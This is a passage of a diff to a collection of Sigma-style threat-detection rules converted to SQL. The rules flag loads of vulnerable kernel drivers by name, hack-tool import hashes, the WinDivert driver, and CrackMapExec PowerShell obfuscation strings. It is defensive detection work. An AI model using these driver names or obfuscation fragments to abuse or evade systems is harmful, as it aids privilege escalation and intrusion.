'%\\\\Dh\\_Kernel\\_10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Dh\\_Kernel.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GLCKIO2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HOSTNT.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwRwDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inpoutx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Mhyprot2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\MsIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msrhook.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NTIOLib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenLibSys.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Se64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_namco.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SysInfo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VProEventMonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WCPU.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WINIODrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\physmem.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp152.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viraglt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vboxdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\speedfan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandra.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elbycdio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\goad.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswsnx.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandbox.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nscm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncpl.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elrawdsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DBUtilDrv2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_RCIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\EneTechIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\EneIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ATSZIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NalDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DirectIo32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DirectIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsUpIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv102.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMEMx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMIXP64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMIx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_Flash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_HWMIO64\\_W10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_HWMIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_I2c64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GVCIDrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwOs2Ec10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwOs2Ec7x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NBIOLib\\_X64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NCHGBIOS2x64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NTIOLib\\_X64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PhlashNT.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Phymemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\UCOREW64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinFlash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtcBSv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflash.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflsh64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow8x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\segwindrvx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\superbmc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_I2cIo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AMDRyzenMasterDriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LHA.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kEvP64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMI.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TmComm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iQVW64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iQVW32.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vmdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HpPortIox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AMDPowerProfiler.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CorsairLLAccess64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\RTCore64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libnicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp.Sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv106.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zamguard64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zam64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\MsIo32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\IOMap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ATSZIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswVmm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FairplayKD.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pgldqpoc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iqvw64e.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Monitor\\_win10\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvnetbus.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Mslo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcdsrvc\\_x64.pkms' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\krpocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HWiNFO64A.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rzpnk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magdrvamd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86-withoutdbg.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gmer.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PCADRVX64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clfs.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ActiveHealth.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CAM\\_V3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GameFire.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitorLib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitorReport.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SmartDashboard.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemGauge.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemGaugeX7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VideoNovaServerControllerService.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ellp\\_service.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hardwareproviders.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ohm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sensorsview32\\_64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\touchpointanalyticsclient.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CQg5Jf.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HCdRDh.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NcDgDn.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vLTZ19.sys' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_drivers_names.yml" + "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" }, { - "title": "WinDivert Driver Load", - "id": "679085d5-f427-4484-9f58-1dc30a7c426d", - "status": "experimental", - "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - CrackMapExec PowerShell Obfuscation", + "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "status": "test", + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "author": "Thomas Patzke", "tags": [ - "attack.collection", + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" + "attack.t1027.005" ], "falsepositives": [ - "Legitimate WinDivert driver usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" ], - "filename": "driver_load_win_windivert.yml" + "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" }, { - "title": "Vulnerable AVAST Anti Rootkit Driver Load", - "id": 